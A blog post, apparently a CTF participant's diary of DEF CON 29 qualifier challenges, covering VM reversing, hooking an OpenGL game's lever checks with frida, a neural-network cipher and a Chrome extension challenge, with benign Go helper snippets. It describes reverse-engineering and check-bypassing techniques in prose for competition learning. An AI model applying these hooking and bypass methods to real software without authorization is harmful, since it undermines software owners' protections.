<h2 id="baby-a-fallen-lap-ray">baby-a-fallen-lap-ray</h2>

<blockquote>
  <p>8:05 AM</p>
</blockquote>

<p>Although I hadn’t signed up for pwn, and had practically no pwn experience beyond some basic stack overflow knowledge, I still took a look at the challenge to find out what it was about, since it was the only one released at the time.</p>

<p>Inside the package there is an ELF executable called <code class="language-plaintext highlighter-rouge">manchester</code>, which is the entry point to the service, a few binaries that start with the magic header <code class="language-plaintext highlighter-rouge">sephiALD</code>, and a mysterious file <code class="language-plaintext highlighter-rouge">p</code> that contains the strings of the menu shown when we connect to the server.</p>

<p>There was a link pointing to the source code of a challenge from the previous year’s DEF CON Finals, and it seemed to be the same thing: <code class="language-plaintext highlighter-rouge">manchester</code> is actually an implementation of a <em>Manchester dataflow machine</em>. I assumed someone must have a disassembler since the challenge came from a previous year, but I couldn’t find any. So I thought it might be a good idea to start by writing a disassembler based on the provided <code class="language-plaintext highlighter-rouge">assmbler.py</code>.</p>

<p>Building an unpacker and disassembler was easy, but converting the raw operations into the form of a <code class="language-plaintext highlighter-rouge">.tass</code> file was a bit confusing; mainly, I couldn’t figure out how the arguments work. One teammate who had read the paper walked me through how parallelism and dataflow work in this machine, and I was able to grasp the idea. Still, recovering the assembled binary back into human-readable <code class="language-plaintext highlighter-rouge">.tass</code> might have been too much for me.</p>
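<p>For anyone else new to dataflow machines, here is a toy Go model of the idea my teammate explained: there is no program counter, and a two-operand instruction fires as soon as both of its input tokens have arrived. This is a generic illustration, not the challenge’s instruction set or token format; <code class="language-plaintext highlighter-rouge">Node</code>, <code class="language-plaintext highlighter-rouge">Dest</code>, <code class="language-plaintext highlighter-rouge">Token</code>, and <code class="language-plaintext highlighter-rouge">Run</code> are made-up names.</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code>package main

// Output is a pseudo node id: tokens sent to it are collected as results,
// with Port used as the result slot.
const Output = -1

// Dest names one input port (0 or 1) of a node.
type Dest struct{ Node, Port int }

// Node is a two-operand instruction: it fires exactly when both of its
// input tokens have arrived, then sends its result to every Dest in Out.
type Node struct {
	Op  func(a, b int) int
	Out []Dest
}

// Token is a value travelling to a destination port.
type Token struct {
	To  Dest
	Val int
}

// Run injects the initial tokens and keeps firing ready nodes until no
// tokens are left. Any node whose operands are present may fire, in any
// order, which is where the parallelism comes from.
func Run(nodes []Node, initial []Token) map[int]int {
	type slot struct {
		val    [2]int
		filled [2]bool
	}
	queue := append([]Token(nil), initial...)
	store := map[int]slot{} // matching store for half-filled nodes
	out := map[int]int{}
	for len(queue) != 0 {
		t := queue[0]
		queue = queue[1:]
		if t.To.Node == Output {
			out[t.To.Port] = t.Val
			continue
		}
		s := store[t.To.Node]
		s.val[t.To.Port] = t.Val
		s.filled[t.To.Port] = true
		if !s.filled[0] || !s.filled[1] {
			store[t.To.Node] = s // wait for the partner operand
			continue
		}
		delete(store, t.To.Node)
		n := nodes[t.To.Node]
		r := n.Op(s.val[0], s.val[1])
		for _, d := range n.Out {
			queue = append(queue, Token{d, r})
		}
	}
	return out
}
</code></pre></div></div>

<p>For example, wiring an add node and a subtract node into a multiply node computes (2+3)×(4-1) = 15, and the add and subtract nodes can fire in either order.</p>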

<p>Teammates reversing it told me that the opcodes and some internal structures had been shuffled, but they quickly figured out what the new opcodes were and updated the table. They also figured out that the mysterious file <code class="language-plaintext highlighter-rouge">p</code> was run by <code class="language-plaintext highlighter-rouge">vm</code>, and <code class="language-plaintext highlighter-rouge">vm</code> was run by <code class="language-plaintext highlighter-rouge">manchester</code>, so figuring out how <code class="language-plaintext highlighter-rouge">manchester</code> works was only the first step; we would still have to reverse <code class="language-plaintext highlighter-rouge">vm</code>, then reverse <code class="language-plaintext highlighter-rouge">p</code>, and finally pwn <code class="language-plaintext highlighter-rouge">p</code>.</p>

<p>I noticed there was a graphing function that draws the dataflow of a program, and with my disassembler I could use it to draw a graph. However, the graph was simply way too large to make any sense of.</p>

<p>Unfortunately I had no other good ideas for this problem, so I handed my code over to my teammates and worked on other problems.</p>

<h2 id="nooombers">nooombers</h2>

<blockquote>
  <p>11:30 AM</p>
</blockquote>

<p>I took a look at this challenge while working on <em>baby-a-fallen-lap-ray</em>, and people somehow just miraculously figured out what each operation meant. Even after some conversation I still didn’t get how they managed it; probably by comparing against common signature algorithms, or just eyeballing. I didn’t know what was happening, so I left the challenge.</p>

<h2 id="exploit-for-dummies">exploit-for-dummies</h2>

<blockquote>
  <p>4:40 PM</p>
</blockquote>

<p>Trivia, but definitely not trivial. The trivia part was rather easy: there were only 25 questions, and you didn’t need to get all of them right to pass the 5000-point mark. The flag was read into memory, but at a random mmapped location with a random offset. Both addresses were erased from the stack, but there was one number equal to the offset XORed with some random numbers that were stored both on the stack and on the heap.</p>
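<p>The masking itself is easy to undo: XOR is its own inverse, so if the random values can be read back from the stack or heap, XOR-ing them into the stored number yields the offset again. A Go sketch, assuming the mask is a plain XOR of 64-bit values (how many values there were and where exactly they lived is not reproduced here; <code class="language-plaintext highlighter-rouge">Unmask</code> is a made-up name):</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code>package main

// Unmask reverses an XOR mask. If masked = offset ^ k1 ^ k2 ^ ..., XOR-ing
// the same keys in again returns offset, because x ^ k ^ k == x.
func Unmask(masked uint64, keys ...uint64) uint64 {
	for _, k := range keys {
		masked ^= k
	}
	return masked
}
</code></pre></div></div>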

<p>If we manage to crash the program, the front-end spins up gdb, and we can input an address starting with <code class="language-plaintext highlighter-rouge">0x</code> for gdb to print the string located there. Nonetheless, it is impossible to simply guess where the string is stored.</p>

<p>My first intuition was that there might be some exploit in that version of gdb, and that we could use the save mechanism of the trivia game to write something that pwns gdb. After some discussion, my teammates and I agreed that we should focus on gdb, because there didn’t seem to be any bugs in the trivia game other than the file-handle close crash.</p>

<p>After playing with gdb, I was able to get the address of the aforementioned number using the <code class="language-plaintext highlighter-rouge">0x0+environ</code> trick. However, I got stuck there, since there seemed to be nothing more I could do. Writing to the <code class="language-plaintext highlighter-rouge">core</code> file was not an option, as a crash would simply overwrite it.</p>

<p>Teammates found some files that gdb would go and read, including <code class="language-plaintext highlighter-rouge">iofclose.c</code>, <code class="language-plaintext highlighter-rouge">.gdb_history</code>, and <code class="language-plaintext highlighter-rouge">trivia.debug</code>. But weirdly, none of us could figure out how this related to shellcoding. I unfortunately lost interest in this challenge, so I moved on to the new challenges.</p>

<h2 id="rick">rick</h2>

<blockquote>
  <p>10:00 PM</p>
</blockquote>

<p>Two hours after the challenge was released, my teammates had made no significant progress, so I jumped in to see where we were.</p>

<h3 id="level-1">Level 1</h3>

<p>I opened the OpenGL game: there was one big building, a lever, and a strange black cube that had fallen into the ground, with “Level 1” written in the corner of the program window. I played around and figured out the basic controls. Peeking through the crack of the door, I saw a yellow lever inside, so we presumably needed to get into the building.</p>

<p>With Wireshark running in the background, I also saw that the game connected to the server when it started but sent nothing, and the server automatically disconnected with <code class="language-plaintext highlighter-rouge">KO</code> after 15 seconds.</p>

<p>Still not wanting to touch Ghidra or IDA, I used <code class="language-plaintext highlighter-rouge">scanmem</code> to try to find the variables that controlled the player coordinates. However, I couldn’t pin down the exact variable and could only filter it down to ~50 locations in memory, and setting them all at once apparently broke the game.</p>
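<p>The idea behind this kind of memory scanning is to narrow candidates by comparing snapshots taken before and after the player moves. A minimal Go sketch of that filtering step, with memory modeled as a slice of <code class="language-plaintext highlighter-rouge">float32</code> values (an assumption about how the coordinates are stored); <code class="language-plaintext highlighter-rouge">Narrow</code> is a hypothetical helper, not part of <code class="language-plaintext highlighter-rouge">scanmem</code>:</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code>package main

// Narrow keeps the candidate indices whose value changed between the two
// snapshots (changed == true) or stayed the same (changed == false).
// Repeating it after every move or pause shrinks the candidate list.
func Narrow(candidates []int, before, after []float32, changed bool) []int {
	var kept []int
	for _, i := range candidates {
		if (before[i] != after[i]) == changed {
			kept = append(kept, i)
		}
	}
	return kept
}
</code></pre></div></div>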

<p>One of my teammates smartly pointed out that we could just look at the cross-references to <code class="language-plaintext highlighter-rouge">gluLookAt</code>, since it calculates the transformation matrix for the camera. Indeed, I found six helper functions that get the eye coordinates and the look vector. Setting the values with gdb was way too much of a hassle, so I wrote a frida script that intercepts one of those functions to print and change the values at will.</p>
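<p>To see why the eye coordinates are effectively the player’s position, here is a Go sketch of the view matrix <code class="language-plaintext highlighter-rouge">gluLookAt</code> is documented to build: a rotation facing from <code class="language-plaintext highlighter-rouge">eye</code> toward <code class="language-plaintext highlighter-rouge">center</code>, followed by a translation by <code class="language-plaintext highlighter-rouge">-eye</code>. <code class="language-plaintext highlighter-rouge">Vec3</code>, <code class="language-plaintext highlighter-rouge">LookAt</code>, and the helpers are mine, not from the game.</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code>package main

import "math"

type Vec3 [3]float64

func sub(a, b Vec3) Vec3     { return Vec3{a[0] - b[0], a[1] - b[1], a[2] - b[2]} }
func dot(a, b Vec3) float64  { return a[0]*b[0] + a[1]*b[1] + a[2]*b[2] }
func normalize(a Vec3) Vec3 {
	l := math.Sqrt(dot(a, a))
	return Vec3{a[0] / l, a[1] / l, a[2] / l}
}
func cross(a, b Vec3) Vec3 {
	return Vec3{a[1]*b[2] - a[2]*b[1], a[2]*b[0] - a[0]*b[2], a[0]*b[1] - a[1]*b[0]}
}

// LookAt builds the gluLookAt view matrix, written here as rows: the
// rotation rows are the side, up, and negated forward vectors, and the
// last column translates the world by -eye, so moving eye moves the camera.
func LookAt(eye, center, up Vec3) [4][4]float64 {
	f := normalize(sub(center, eye))
	s := normalize(cross(f, up))
	u := cross(s, f)
	return [4][4]float64{
		{s[0], s[1], s[2], -dot(s, eye)},
		{u[0], u[1], u[2], -dot(u, eye)},
		{-f[0], -f[1], -f[2], dot(f, eye)},
		{0, 0, 0, 1},
	}
}
</code></pre></div></div>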

<p>I teleported into the building only to see a giant Rickroll (which I had anticipated, given that the challenge is called rick). The image had Rick Astley saying “Don’t Cheat,” so teleporting was apparently not an option. Somehow I thought the clue might be hidden in the textures, i.e., that if you managed to open the door without cheating, another image would appear. So I dumped all the textures, only to find nothing there.</p>

<p>Then some teammates, back-tracing from the call to <code class="language-plaintext highlighter-rouge">send</code>, figured out that the ‘E’ key does something, and observed that certain conditions had to be met to enter the function that sends data to the server. I simply hooked that function to always return 1, and whoosh, the door opened and the lever and block outside turned white, but nothing else happened.</p>

<p>Further reversing of the function revealed that it goes through all the levers in the map and checks whether the player is inside the bounding box of one of them, returning 1 if so. However, the function also did some other work that simply hooking its return value skipped, so I hooked the actual low-level checking function instead. And boom, I was in level 2.</p>
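<p>The check described above boils down to an axis-aligned bounding-box test. A Go sketch, assuming each lever has such a box; <code class="language-plaintext highlighter-rouge">Box</code> and <code class="language-plaintext highlighter-rouge">NearLever</code> are hypothetical names, not the game’s functions:</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code>package main

import "math"

type Vec3 [3]float64

// Box is an axis-aligned bounding box given by its min and max corners.
type Box struct{ Min, Max Vec3 }

// within reports lo ≤ v ≤ hi by checking that clamping v into [lo, hi]
// leaves it unchanged (assumes lo ≤ hi; NaN is never within).
func within(v, lo, hi float64) bool {
	return math.Min(math.Max(v, lo), hi) == v
}

// Contains reports whether point p lies inside b on all three axes.
func (b Box) Contains(p Vec3) bool {
	for i := range p {
		if !within(p[i], b.Min[i], b.Max[i]) {
			return false
		}
	}
	return true
}

// NearLever scans every lever's box and returns the index of the first
// one containing the player, or -1 if the player is near none of them.
func NearLever(player Vec3, levers []Box) int {
	for i, b := range levers {
		if b.Contains(player) {
			return i
		}
	}
	return -1
}
</code></pre></div></div>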

<h3 id="level-29">Level 2~9</h3>

<p>I didn’t know what had happened, but Wireshark told me that an exchange with the server had taken place. Not long after that, we finally figured out that you can simply press ‘E’ on the levers to trigger them. Having been a gamer for so long and not realizing that, I was disappointed in myself.</p>

<p>As a gaming boi, I was able to fly through the first 6 levels manually within the 15 seconds each level allowed, but starting from level 7 there were too many levers to do by hand. So I wrote a script to automate the process, with a hardcoded list of levers to press.</p>

<h3 id="level-10">Level 10</h3>

<p>Then I arrived at level 10, where I realized that the logic is randomized each time you play it. Because of my lack of experience, I thought this must be the final level, since it was different from the rest.</p>

<p>Still not wanting to do much work because I was pretty tired at that point, I figured out one combination of levers that passed level 10 and just left my script running, hoping that sooner or later the randomization would make this combination work again.</p>

<p>And indeed it worked, only that I was met by level 11.</p>

<h3 id="level-1137">Level 11~37</h3>

<p>Okay, it’s time to fuzz, I thought. While others were still reversing the protocol, I started writing an algorithm to switch the levers at random automatically and see if the door opens. At first I gave each lever a fixed probability \(p\) of being on, but that didn’t work well and only got me through the first 17 levels. Watching it run, I noticed that only the lower-indexed levers were constantly being switched, not the higher-indexed ones. Then I realized that since the check stops at the first lever it detects, the levers don’t have equal probabilities of being switched; instead, the index of the switched lever follows a geometric distribution.</p>
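<p>The bias is easy to quantify, assuming the check walks the levers in index order, accepts each one independently with probability \(p\), and stops at the first one it accepts: lever \(k\) is then picked with probability \((1-p)^k p\). A short Go sketch computing that distribution (<code class="language-plaintext highlighter-rouge">FirstPickProbabilities</code> is a made-up name):</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code>package main

// FirstPickProbabilities returns, for each of n levers, the chance that it
// is the first one accepted when every lever is accepted independently with
// probability p and the scan stops at the first hit: P(k) = (1-p)^k * p.
func FirstPickProbabilities(n int, p float64) []float64 {
	probs := make([]float64, n)
	reach := 1.0 // probability that the scan gets as far as lever k
	for k := range probs {
		probs[k] = reach * p
		reach *= 1 - p
	}
	return probs
}
</code></pre></div></div>

<p>With \(p = 0.5\), lever 0 is picked half the time while lever 9 is picked only about 0.1% of the time, which matches the lower-indexed levers doing all the switching.</p>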

<p>I tried a lot of fixes, including generating a random number whose bits represent the on/off states of the levers, and giving each lever its own Bernoulli probability to see how it goes. Finally I settled on recording the index of the last lever pulled, to make sure every lever has a chance of being pulled at least once, and checking the state of the final gate so that we move on to the next level as soon as we have an acceptable answer. I also played around with different probability distributions, because apparently some levels require many levers to be pulled and some require fewer.</p>

<p>I also optimized a lot of other things. At first I teleported around to press the levers, only to realize that was pretty inefficient. Later I simply held ‘E’ down the whole time and, using an internal counter, told the function to return true at my intended lever index. I also hooked <code class="language-plaintext highlighter-rouge">glutSetTimer</code> to set its arguments to 0, so each refresh is much quicker and many more trials can be done within 15 minutes.</p>

<h3 id="level-37100">Level 37~100</h3>

<p>I was able to get to level 37, but fuzzing couldn’t take me any further. I kind of already knew that this called for a CSP or BSP solver, because LiveOverflow once did a challenge pretty similar to this one. Meanwhile, my teammates finally reversed the protocol and realized that it is simply a tree structure leading from the levers to the final gate. So all that was left was to write the exploit.</p>
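<p>Once the circuit is known to be a tree, no general solver is needed: a target output can be pushed from the final gate down to the levers, because every lever appears only once and choices in different subtrees cannot conflict. A Go sketch assuming AND/OR/NOT gates (the real gate types from the protocol are not described here, and all names are hypothetical):</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code>package main

// Kind is the type of a node in the lever circuit (assumed gate set).
type Kind int

const (
	Lever Kind = iota
	And
	Or
	Not
)

// Gate is a node in the tree; Index is used only for Lever leaves.
type Gate struct {
	Kind     Kind
	Index    int
	Children []*Gate
}

// Eval computes a gate's output for the given lever states.
func Eval(g *Gate, levers map[int]bool) bool {
	switch g.Kind {
	case Lever:
		return levers[g.Index]
	case Not:
		return !Eval(g.Children[0], levers)
	case And:
		for _, c := range g.Children {
			if !Eval(c, levers) {
				return false
			}
		}
		return true
	default: // Or
		for _, c := range g.Children {
			if Eval(c, levers) {
				return true
			}
		}
		return false
	}
}

// Solve records lever states in levers so that g evaluates to want.
// Levers it never touches stay off (the map's zero value).
func Solve(g *Gate, want bool, levers map[int]bool) {
	switch g.Kind {
	case Lever:
		levers[g.Index] = want
	case Not:
		Solve(g.Children[0], !want, levers)
	case And, Or:
		// AND is true only if all children are true; OR is false only if
		// all children are false. Otherwise a single child decides it.
		if want == (g.Kind == And) {
			for _, c := range g.Children {
				Solve(c, want, levers)
			}
		} else {
			Solve(g.Children[0], want, levers)
		}
	}
}
</code></pre></div></div>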

<p>At 6:45 AM on the second day, we got the flag.</p>

<h1 id="day-2">Day 2</h1>

<p>Still no web challenges had been released, so I took a look at various other challenges.</p>

<h2 id="pza999">pza999</h2>

<blockquote>
  <p>6:50 AM</p>
</blockquote>

<p>I downloaded the package, only to realize there’s another QEMU VM kernel image. I had no idea what to do.</p>

<h2 id="segnalooo">segnalooo</h2>

<blockquote>
  <p>7:00 AM</p>
</blockquote>

<p>Another pwn. The reversing part seemed straightforward, and the input seemed to be a hex number. I tried “0000” locally and it went through to the next line of output, but when I tried the same on the server it said “invalid hex” and wouldn’t let me proceed. Again, I didn’t know what to do next.</p>

<hr />

<p>After less than 3 hours of sleep, I woke up from a camp bed at 9:30 AM, and jumped back to work.</p>

<h2 id="coooinbase">coooinbase</h2>

<blockquote>
  <p>9:40 AM</p>
</blockquote>

<p><code class="language-plaintext highlighter-rouge">src</code> is actually a <code class="language-plaintext highlighter-rouge">.gz</code> file; after decompression there was a <code class="language-plaintext highlighter-rouge">.html</code> front end, a <code class="language-plaintext highlighter-rouge">.rb</code> backend, and a <code class="language-plaintext highlighter-rouge">.sh</code> script that runs the QEMU VM. The front end takes input and feeds it to the Ruby backend, which checks some conditions on the input, encodes it as BSON and then base64, and feeds it into the virtual machine. However, I had no idea how to statically analyze the kernel image (it’s not an ELF), and I’m not a pwn technician, so I really couldn’t help here.</p>
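<p>For the encoding step, here is a hand-rolled Go sketch that produces a one-field BSON document and base64-encodes it. The field name and value are made up, and the real backend (in Ruby) presumably used a BSON library and a different document shape; <code class="language-plaintext highlighter-rouge">BSONString</code> and <code class="language-plaintext highlighter-rouge">EncodeForVM</code> are hypothetical names.</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code>package main

import (
	"encoding/base64"
	"encoding/binary"
)

// BSONString encodes the one-field document {key: value} by hand: int32
// total size, element type 0x02 (UTF-8 string), the key as a NUL-terminated
// cstring, int32 string length including its NUL, the string bytes, NUL,
// and a final NUL closing the document. key must not contain a NUL byte.
func BSONString(key, value string) []byte {
	var n [4]byte
	elem := []byte{0x02}
	elem = append(elem, key...)
	elem = append(elem, 0)
	binary.LittleEndian.PutUint32(n[:], uint32(len(value)+1))
	elem = append(elem, n[:]...)
	elem = append(elem, value...)
	elem = append(elem, 0)

	size := 4 + len(elem) + 1
	doc := make([]byte, 4, size)
	binary.LittleEndian.PutUint32(doc, uint32(size))
	doc = append(doc, elem...)
	return append(doc, 0)
}

// EncodeForVM applies the two steps in order: BSON, then base64.
func EncodeForVM(key, value string) string {
	return base64.StdEncoding.EncodeToString(BSONString(key, value))
}
</code></pre></div></div>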

<h2 id="smart-cryptooo">smart-cryptooo</h2>

<blockquote>
  <p>10:30 AM</p>
</blockquote>

<p>The challenge was tagged machine learning and easy, which seemed suitable for a noob like me. I trained the model for some time and was able to encrypt and decrypt custom messages successfully. The file name indicated that the original text came from <code class="language-plaintext highlighter-rouge">philosophy.html</code> on OOO’s website. Certainly there was more to it.</p>

<p>After taking a look at the Python file, it was pretty easy to figure out the entire encryption and decryption process and how the models are trained. The default message and key sizes are 64 <em>bits</em>, where each bit is actually a float64 number; we’ll use these sizes from now on.</p>

<h3 id="alice-and-encryption">Alice and encryption</h3>

<p>Alice is a 4-layer model that encrypts a message with a key. It takes in a plaintext message (1×64 vector) and a key (1×64 vector), and outputs the encrypted message (1×64 vector). The encryption procedure for an entire text goes like this:</p>

<p>First, split the text into 8-byte messages, padding the end with spaces. Each 8-byte message is then converted into a big-endian 64-bit number, and each number into a 1×64 feature vector, where one bit corresponds to one feature: if the bit is 1 the feature is -1, otherwise the feature is 1. Every 16 (<code class="language-plaintext highlighter-rouge">bunch_size</code>) messages are grouped into a bunch and encrypted with the same key, by feeding these 16 messages along with the key into the Alice model. A random 8-byte (64-bit) key is also generated to encrypt the next bunch of messages; this new key is itself encrypted with the current key and appended to the current bunch of encrypted messages.</p>
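<p>The preprocessing can be sketched in Go as follows. The most-significant-bit-first ordering of features is my assumption, the grouping into bunches of 16 with key chaining is left out, and <code class="language-plaintext highlighter-rouge">EncodeText</code> is a hypothetical name.</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code>package main

import (
	"encoding/binary"
	"fmt"
)

// EncodeText pads text with spaces to a multiple of 8 bytes, reads each
// 8-byte block as a big-endian uint64, and maps every bit to a feature:
// a 1 bit becomes -1 and a 0 bit becomes 1 (most significant bit first).
func EncodeText(text string) [][64]float64 {
	b := []byte(text)
	for len(b)%8 != 0 {
		b = append(b, ' ')
	}
	var msgs [][64]float64
	for len(b) != 0 {
		v := binary.BigEndian.Uint64(b[:8])
		var f [64]float64
		for i, c := range fmt.Sprintf("%064b", v) {
			if c == '1' {
				f[i] = -1
			} else {
				f[i] = 1
			}
		}
		msgs = append(msgs, f)
		b = b[8:]
	}
	return msgs
}
</code></pre></div></div>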

<h3 id="bob-and-decryption">Bob and decryption</h3>

<p>The Bob model has exactly the same structure as Alice. The only difference is that, functionally, it takes in an encrypted message and the key that was used to encrypt it, and outputs the decrypted message. The decryption procedure is simply the reverse of the above using the Bob model, nothing special.</p>

<h3 id="the-magic-eve">The magic Eve</h3>

<p>How do we prevent the models from just being lazy and not encrypting at all? That’s where the Eve model steps in. Eve is identical to the Alice and Bob models, except that it has a new input layer before the original input layer, which takes in only the encrypted message and is densely connected to the original input layer. We define the loss of the Eve model as the absolute difference between Eve’s output and the corresponding plain message, meaning that if we could train Eve to have a small loss, we would be “breaking” the encryption.</p>

<h3 id="abe-model">ABE model</h3>

<p>Now we define a new ABE model, which trains the above three models at the same time. We randomly generate a plain message and a key, encrypt the message using the Alice model, decrypt it using the Bob model, and define the Alice-Bob Loss as the difference between the original message and the decrypted message. We feed the intermediate encrypted message into Eve and calculate the Eve Loss. The ABE model loss is then defined as \(\text{Alice-Bob Loss} + \frac{\left(32 - \text{Eve Loss}\right)^2}{ 32^2 }\), where \(32\) is half the message size. I don’t know where it got the equation from, but apparently this model is an adversarial network: it wants the Alice-Bob Loss to be as small as possible while pushing the Eve Loss toward 32.</p>
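<p>A Go sketch of the two loss pieces as described, with <code class="language-plaintext highlighter-rouge">L1</code> as the absolute-difference distance and <code class="language-plaintext highlighter-rouge">ABELoss</code> combining it with the Alice-Bob Loss; the function names are mine, not the challenge’s.</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code>package main

import "math"

// L1 is the sum of absolute differences between two equal-length vectors,
// the kind of distance used for the Eve Loss.
func L1(a, b []float64) float64 {
	var d float64
	for i := range a {
		d += math.Abs(a[i] - b[i])
	}
	return d
}

// ABELoss computes abLoss + (n/2 - eveLoss)^2 / (n/2)^2, where n is the
// message size (64 here, so n/2 is 32). The extra term is 0 when
// eveLoss == n/2 and grows as Eve's loss moves away from n/2 either way.
func ABELoss(abLoss, eveLoss float64, n int) float64 {
	half := float64(n) / 2
	return abLoss + (half-eveLoss)*(half-eveLoss)/(half*half)
}
</code></pre></div></div>

<p>The extra term reaches 1 when Eve is perfect (Eve Loss 0), so minimizing the ABE loss pushes Eve’s error toward the middle rather than toward 0.</p>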

<hr />

<p>With the above sorted out, I started experimenting with a lot of things. First, I confirmed that encryption and decryption depend heavily on the trained weights (i.e., the training time) rather than on the model architecture: if I encrypted a message with models I had trained for 5 minutes, the models I trained for 30 minutes could not decrypt it even with the correct key, and vice versa. Second, I realized that if the models weren’t trained long enough, the decryption could easily be broken. Third, even with the wrong key, the entropy of the decrypted message stays roughly the same, which means that if the decrypted message is mostly 0x00 or 0xFF, it is most likely the model weights affecting it rather than a wrong key.</p>
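<p>One simple way to quantify that entropy check is Shannon entropy over the decrypted bytes. A Go sketch of one possible measure (<code class="language-plaintext highlighter-rouge">ByteEntropy</code> is a hypothetical helper, not necessarily what I computed at the time):</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code>package main

import "math"

// ByteEntropy returns the Shannon entropy of data in bits per byte: 0 for
// a constant buffer such as all 0x00, up to 8 for uniformly random bytes.
func ByteEntropy(data []byte) float64 {
	if len(data) == 0 {
		return 0
	}
	var counts [256]int
	for _, b := range data {
		counts[b]++
	}
	n := float64(len(data))
	var h float64
	for _, c := range counts {
		if c == 0 {
			continue
		}
		p := float64(c) / n
		h -= p * math.Log2(p)
	}
	return h
}
</code></pre></div></div>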

<p>So I first tried observing the training process. For each epoch, I decrypted the first 8-byte message of the given ciphertext with a random key, to see when it would spit out text with the right entropy. I watched for a long time, but it didn’t seem to give off any useful information.</p>

<p>I then thought it might be possible to use the Eve model somehow. I knew that Eve must already have a large enough loss for the ABE model to work, so it wouldn’t work if I tried to use it to decrypt the entire message. However, that assumes the keys are different each time. What if the Eve model could work when the key stays the same, and the weights do the magic?</p>

<p>Meanwhile, my teammates found some repeating 8-byte messages in the original HTML, and figured out where the changes were made by comparing the locations of the repeating messages within the same bunch in the plain text and in the given encrypted message. They concluded that one change happened at around 12,000 bytes.</p>
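<p>Because the model is deterministic, equal plaintext messages encrypted under the same key should produce equal ciphertext vectors, which is what makes comparing repeat positions meaningful. Finding repeated 8-byte messages in the plaintext is a few lines of Go; <code class="language-plaintext highlighter-rouge">RepeatedBlocks</code> is an illustrative name:</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code>package main

// RepeatedBlocks splits data into 8-byte messages (dropping any partial
// tail) and returns, for every message that occurs more than once, the
// message indices at which it appears.
func RepeatedBlocks(data []byte) map[string][]int {
	data = data[:len(data)/8*8]
	seen := map[string][]int{}
	for i := 0; len(data) != 0; i++ {
		key := string(data[:8])
		seen[key] = append(seen[key], i)
		data = data[8:]
	}
	for k, idx := range seen {
		if len(idx) == 1 {
			delete(seen, k) // deleting during range is allowed in Go
		}
	}
	return seen
}
</code></pre></div></div>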

<p>This gave me a lot of hope, as I could be sure that no changes were made before 10,000 bytes, which meant I had about 1,250 training points (8-byte messages) to use. My idea was to first use the first 16 messages to train an Eve model that decrypts these 16 messages and, consequently, the first generated key stored in the 17th message. Then I would use the next 16 messages to train another Eve model to do the same job, and so on. After recovering the keys for the first 1,250 messages, I could use them to train a Bob model that works for this dataset, and use it to decrypt the entire text.</p>

<p>However, someone beat me to it and got the flag. When I looked at his exploit, there was <strong>NO</strong> machine learning involved. The exploit simply computed some matrices and solved a linear matrix equation to get a transformation matrix between the encrypted message and the plain message. I was like, WHAT?</p>

<h2 id="threefactooorx">threefactooorx</h2>

<blockquote>
  <p>2:30 PM</p>
</blockquote>

<p>While working on <code class="language-plaintext highlighter-rouge">smart-cryptooo</code>, I jumped out to see what was going on with this literally “one-and-only” web challenge. There was just a website to upload an HTML file, and one file to download with a <code class="language-plaintext highlighter-rouge">.crx</code> extension. I realized the task must be to write an HTML exploit that cracks this Chrome extension. Unzipping the extension, we find two scripts: a background JS file that seemingly returns the flag, and another JS file that is obfuscated. However, it really wasn’t much of an obfuscation, and with a bit of manual restoring of the strings it was pretty clear what we needed to do for the script to print the flag for us.</p>

<p>Too many other people were working on this challenge, and they were all faster than me since I was late to the game. Before long, they got the flag.</p>

<h2 id="looocked-ooout">looocked-ooout</h2>

<blockquote>
  <p>12:15 AM, after midnight</p>
</blockquote>

<p>Before going to sleep, I wanted to see if there was anything else I could do for the team. And yet another pwn. I think the goal might be to pwn the given <code class="language-plaintext highlighter-rouge">cid</code> binary, which is seemingly an mp3 loader, maybe by crafting a special mp3 or something. I dragged it into Ghidra, analyzed, decompiled, shook my head, and closed all the windows.</p>

<h1 id="0xff">0xFF</h1>

<p>I woke up after the event was over. It was really nice to see that our team was in third place, meaning we qualified for the finals (although I won’t be there). I was also really surprised to see that at one point (an hour before the end) we were even in first place, although I contributed nothing to it.</p>

<p>After playing in such a professional, competitive, and polished CTF event, I think I still have a lot to learn, especially in pwn and reversing. One thing I feel okay about is that I could keep up with the pace, and I still offered my teammates some insights on a few of the challenges, even though it was my first CTF. Also, the format was jeopardy instead of attack-defense, which is a whole new area I have absolutely no experience in.</p>

<p>CTF is definitely something interesting that I want to experience again. Until then, see you next time.</p>

<hr />

<p>P.S. I think it might be interesting to come up with an easy CTF/ARG for university students to play. If you have the same idea, contact me!</p>]]></content><author><name>Hanbang Wang</name><email>contact@hanbang.wang</email></author><category term="blog" /><category term="Programming" /><category term="CTF" /><category term="Hacking" /><category term="Pwn" /><category term="Reversing" /><category term="DEFCON" /><summary type="html"><![CDATA[I was one of the Tea Deliverers at DEF CON 29 CTF Quals.]]></summary></entry><entry><title type="html">Compositions</title><link href="http://0.0.0.0/blog/compositions/" rel="alternate" type="text/html" title="Compositions" /><published>2020-12-14T23:45:00-05:00</published><updated>2020-12-14T23:45:00-05:00</updated><id>http://0.0.0.0/blog/compositions</id><content type="html" xml:base="http://0.0.0.0/blog/compositions/"><![CDATA[<p>Here are some of my compositions in music.
<!--more--></p>

<h1 id="musc-79">MUSC 79</h1>

<h2 id="dream-in-pure-data">Dream in Pure Data</h2>

<iframe style="border: 0; width: 100%; height: 307px;" src="https://bandcamp.com/EmbeddedPlayer/album=2432380295/size=large/bgcol=ffffff/linkcol=7137dc/artwork=none/transparent=true/" seamless=""><a href="https://superfashi.bandcamp.com/album/intro-to-electronic-music">Dream in Pure Data by SuperFashi</a></iframe>

<p>A 1h30m run of my Pure Data patch.</p>

<h2 id="retro-gameplaying-as-instrument-interface">Retro Gameplaying as Instrument Interface</h2>

